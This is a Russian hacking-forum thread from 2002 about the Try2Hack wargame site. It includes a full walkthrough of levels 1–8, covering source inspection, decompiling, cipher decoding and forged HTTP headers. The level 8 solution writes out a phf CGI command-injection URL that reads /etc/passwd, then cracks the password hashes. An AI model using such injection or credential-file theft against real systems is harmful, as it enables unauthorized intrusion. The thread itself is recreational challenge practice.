Легенда:
 новое сообщение
 закрытая нитка
 новое сообщение
 в закрытой нитке
 старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
| |
Действительно интересная игра. Затягивает... 14.05.02 16:05 Число просмотров: 1673
Автор: fly4life <Александр Кузнецов> Статус: Elderman
|
|
|
|
<hacking>
|
Головоломка для хакера - Try2Hack 27.03.02 05:01
Автор: Renkvil <Boris> Статус: Member
|
Предлагаю вашему вниманию достатчно известный в западной хакерской сцене сайт из разряда "hack-it" aka "hacker competition"
http://www.try2hack.nl
Сайт предлагает 9 уровней сложности, разнообразные задания (JavaScript, Flash...) и не всегда тривиальные решения.
Решения можно постить нитками, пока dl не прибьёт thread :), или мне на мыло theboris@mail.ru
Если возникнет интерес, запостю ссылки на аналогичные ресурсы.
Борис aka Renkvil
Головоломка для хакера - Try2Hack
|
|
Это наверное единственный пост, который собрал столько просмотров..... уже почти 2200!!! Сильно... 14.05.02 12:11
Автор: DamNet <Denis Amelin> Статус: Elderman
Отредактировано 16.05.02 21:36 Количество правок: 1
|
|
|
| |
На неделе надо будет запостить новую головоломку. 14.05.02 16:28
Автор: Renkvil <Boris> Статус: Member
Отредактировано 14.05.02 16:28 Количество правок: 1
|
|
|
| | |
Только просьба 15.05.02 22:20
Автор: Sir-G Статус: Незарегистрированный пользователь
|
|
не публиковать решения, по крайней мере первое время. Можно говорить до какого уровня дошел и делать небольшие подсказки.
|
| | |
уже ещё что-то нашёл? 14.05.02 16:43
Автор: fly4life <Александр Кузнецов> Статус: Elderman
Отредактировано 14.05.02 16:44 Количество правок: 1
|
|
|
| |
Действительно интересная игра. Затягивает... 14.05.02 16:05
Автор: fly4life <Александр Кузнецов> Статус: Elderman
|
|
|
|
level6: Народ, а какое всё же правильное название... 10.05.02 22:02
Автор: Renkvil <Boris> Статус: Member
|
...для "шифрования" на 6-ом уровне?
Начинается оно на вроде на "B", если верить указанной маске со "*".
Просто интересно стало!
|
| |
Baconian (шифр Бэкона) 11.05.02 10:53
Автор: :-) <:-)> Статус: Elderman
|
|
|
|
Всё это давно уже не головоломка 09.05.02 18:40
Автор: zonny <Sasha> Статус: Member
|
|
|
| |
Скоро наверно будет 10-й уровень 11.05.02 11:17
Автор: :-) <:-)> Статус: Elderman
|
[JuPiLeR] (автор 9-го) работает над ним...
Я 9-й прошел за 3 недели :-)) Тяжеловато, если до этого eggdrop не конфигурил.
IMHO 9-й там как-то глючно работает: сразу после добавления юзера нельзя сделать DCC chat с ботом, но где-то через час получается.
|
| | |
Интересно, кто ещё прошёл все уровни? 11.05.02 22:40
Автор: Renkvil <Boris> Статус: Member
|
|
Я до 6-ого дошёл, потом решение опубликовали..
|
| |
А что же? :-)) 10.05.02 02:19
Автор: Renkvil <Boris> Статус: Member
|
|
|
| | |
Ну все ответы выкладываются, разве это интересно? 10.05.02 15:10
Автор: zonny <Sasha> Статус: Member
|
|
|
| | | |
Ну все ответы выкладываются, разве это интересно? 10.05.02 19:53
Автор: fly4life <Александр Кузнецов> Статус: Elderman
Отредактировано 10.05.02 19:55 Количество правок: 1
|
Модет это и не интересно, но их читать никто не заставляет. Я тож считал, что не интересно и не читал... пока не дошёл до четвёртого уровня ... а потом всё... потерял сон, аппетит... %))
Сам пройти не смог, скока я не геморроился, а узнать что дальше очень хотелось. =) Помогла подсказка из ответов
|
| | | | |
Да вобщем-то тоже самое, но азарт потерялся 10.05.02 20:05
Автор: zonny <Sasha> Статус: Member
|
|
|
| | | | | |
Впринципе да... 10.05.02 20:10
Автор: fly4life <Александр Кузнецов> Статус: Elderman
Отредактировано 10.05.02 20:14 Количество правок: 1
|
|
над остальными я уже так долго не геморроился, как над третьем и втором (всё-таки тянет немного глянуть =)), но... сдаётся мне, что без подсказок я бы не прошёл ни один из них =), а ты? ;)
|
| | | |
Так не читай их. А до куда ты сам дошёл? 10.05.02 18:34
Автор: Renkvil <Boris> Статус: Member
|
|
|
|
Головоломка для хакера - Try2Hack -= решение всех уровней =- 18.04.02 00:03
Автор: VirX Статус: Незарегистрированный пользователь
|
Рабочая неделя кончилась вот и решил заняться :
Level1
View HTML
Passwd : hackerzzz
Next level: levvel2.html
========================================================
Level2
смотрим хетемель
находим там ссылку на флеш и качаем файл FlashLevel2.swf
смотрим фаром и видим:
txtUsername �–
Try2Hack I–
txtPassword �–
NokiaIsGood I��ќ� � ѓ� LLeVeLL3.html
видим, что пароль и логин у нас
Username:Try2Hack
Password:NokiaIsGood
Next level:LLeVeLL3.html
========================================================
Level3
Долго парился не потому что сложно а потому что смотрел невнимательно :(
а там все просто - смотрим хтм и видим:
<SCRIPT src="JavaScript"></SCRIPT>
<SCRIPT language="JavaScript">
.........
качаем файл http://www.try2hack.nl/JavaScript а там видим:
-
PASSWORD = "TheCorrectAnswer";
CORRECTSITE = "thelevel4.html";
WRONGSITE = "http://www.disney.com";
-
========================================================
Level4
Свиду показалось сложно т.к. я на знаю Java, но эт токо свиду
берем JavaDecompiller смотрим, что получилось
я юзал DJ Java Decompiller v2.9.9.61 by 2000 Atanas Neshkov прикольная прога
скачать мона отсюда: http://members.fortunecity.com/neshkov/dj.html
видим строчку:
-
infile = new String("level4");
-
http://www.try2hack.nl/level4
пробуем открыть и видим:
-
5_level_5.html
Try2Hack
AppletsAreEasy
-
логин : Try2Hack
пароль : AppletsAreEasy
и next level : 5_level_5.html
========================================================
Levek 5
Берем декомпилятор VB я скачал с http://dore.ru
видим примерно вот такую хрень
-
Const mc001A ="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.,:;-*+=~!_$#@()[]{}<\/>"
Const mc001E = "http://www.try2hack.f2s.com/login-level6.html"
Const mc0022 = " txtUsername=AlmostAHacker " |Обмануть хотели :)
Const mc0026 = " txtPassword=ZqrE01A2d " |
Sub cmdLogin_Click ()
Dim l003C As String
Dim l003E As Variant
If txtUsername <> Mid(mc001A, 56, 1) & Mid(mc001A, 28, 1) & Mid(mc001A, 35, 1) & Mid(mc001A, 3, 1) & Mid(mc001A, 44, 1) & Mid(mc001A, 11, 1) & Mid(mc001A, 13, 1) & Mid(mc001A, 21, 1) Then
MsgBox "Username not accepted."
Exit Sub
End If
If txtPassword <> Mid(mc001A, 51, 1) & Mid(mc001A, 31, 1) & Mid(mc001A, 30, 1) & Mid(mc001A, 51, 1) & Mid(mc001A, 16, 1) & Mid(mc001A, 45, 1) & Mid(mc001A, 24, 1) & Mid(mc001A, 29, 1) & Mid(mc001A, 26, 1) & Mid(mc001A, 19, 1) & Mid(mc001A, 28, 1) & Mid(mc001A, 11, 1) & Mid(mc001A, 30, 1) & Mid(mc001A, 19, 1) & Mid(mc001A, 25, 1) & Mid(mc001A, 24, 1) Then
MsgBox "Username/Password don't match."
Else
MsgBox "User logged in !"
l003C$ = Left$(mc001E, 28) & Mid(mc001A, 22, 1) & Mid(mc001A, 67, 1) & Mid(mc001A, 15, 1) & Mid(mc001A, 67, 1) & Mid(mc001A, 32, 1) & Mid(mc001A, 67, 1) & Mid(mc001A, 15, 1) & Mid(mc001A, 67, 1) & Mid(mc001A, 22, 1) & Mid(mc001A, 67, 1) & Mid(mc001A, 7, 1) & Mid(mc001A, 63, 1) & Mid(mc001A, 18, 1) & Mid(mc001A, 30, 1) & Mid(mc001A, 23, 1) & Mid(mc001A, 22, 1)
MsgBox "For Windows NT / Windows 2000 users :" & Chr$(13) & Chr$(10) & Chr$(13) & Chr$(10) & l003C$
l003E = Shell("start " & l003C$)
End If
End Sub
-
хоть бейсика и не знаю, но интуитивно понято, что функция Mid возвращает символы из
строки а оператор '&' их склеивает. Пишим прогу на паскале (можно и самому подсчитать, но впадлу):
---
const
c : string ='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.,:;-*+=~!_$#@()[]{}<\/>';
var
s : string;
begin
write('Username:');
s:=c[56]+c[28]+c[35]+c[3]+c[44]+c[11]+c[13]+c[21];
writeln(s);
write('Password:');
s:=c[51]+c[31]+c[30]+c[51]+c[16]+c[45]+c[24]+c[29]+c[26]+c[19]+c[28]+c[11]+c[30]+c[19]+c[25]+c[24];
writeln(s);
write('Next Level : http://www.try2hack.nl/');
s:=c[22]+c[67]+c[15]+c[67]+c[32]+c[67]+c[15]+c[67]+c[22]+c[67]+c[7]+c[63]+c[18]+c[30]+c[23]+c[22];
writeln(s);
end.
---
Компилим, запускаем и нам вываливает:
Username:Try2Hack
Password:OutOfInspiration
Next Level : http://www.try2hack.nl/l-e-v-e-l-6.html
=================
Level 6
Берем снифер. Я брал Ethernal. Снифаем и видим что идет GET запрос к файлу
http://www.try2hack.nl/p.lv6
там видим следующие:
---
(ENCRYPTION TYPE)
B*C*N**N
(USERNAME)
ababa abbab baaaa aaabb
(PASSWORD)
ababa aaaaa abbaa abbba aaaaa baaaa baaba babba
(PAGE)
ababa aabaa baabb aabaa ababa baaab aabaa baabb aabaa abbaa
�
---
L:LORD
P:LANPARTY
трейсить VB в сайсе квалификации не хватает :(
в криптографии не силен, но после долгих поисков была найдена данная ссылка:
http://tools.100mbit.nl/decrypt.php
---
=================
Level 7
После 6-го прямо халява :)
телнетимся на 80 порт сайта и скармливаем ему нечто типа
---
GET /cgi-bin/level7.pl HTTP/1.1
Accept:/
Referer: http://www.microsoft.com/ms.htm
Accept-Language: ru
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.72; UNIX/LINUX)
Host: www.try2hack.nl
Connection: Keep-Alive
---
и получаем следующие сообщение (теги выдрал):
Browser check : OK
OS check : OK
Link check : OK
Nextlevel : http://www.try2hack.nl/Level-8.html
Password for the messageboard is : TonyHawk2
===========
Level 8
Полная халява юзишь эксплоит и получаем пароль
http://www.try2hack.nl/cgi-bin/phf.cgi?Qalias=x%0a/bin/cat%20/etc/passwd
причем только Qalias хотя в некоторых багатрахах QALIAS
ну и рипером потом :)
L: BuiZe
P: arsanik
входим и получаем:
User "BuiZe" logged in.
New message for BuiZe :
Level 8 completed !
Go to irc.quakenet.org and join #try2hack
There type /msg bofh begin
===========
Level 9
так и не посмотрел у них на канале бот сдох уже давненько :(
ЗЫ: в принципе просто все кроме 6-го уровня (мне так показалось)
|
| |
Кто-нибудь занимался девятым уровнем? 09.05.02 16:13
Автор: Sir-G Статус: Незарегистрированный пользователь
|
> найдена данная ссылка:
> http://tools.100mbit.nl/decrypt.php
Как же ты ее нашел:)) Я вот лично сам расшифровывал... И что значят магические строчки
(ENCRYPTION TYPE)
B*C*N**N
????
Че-то про 9-ый уровень не понял. Как называется бот, которого надо хачить?(вроде level-9, но такого нет) . К чему там был ключ, выданный ботом try2hack?
|
|
|
подробно о проекте
Анализ криптографических сетевых...
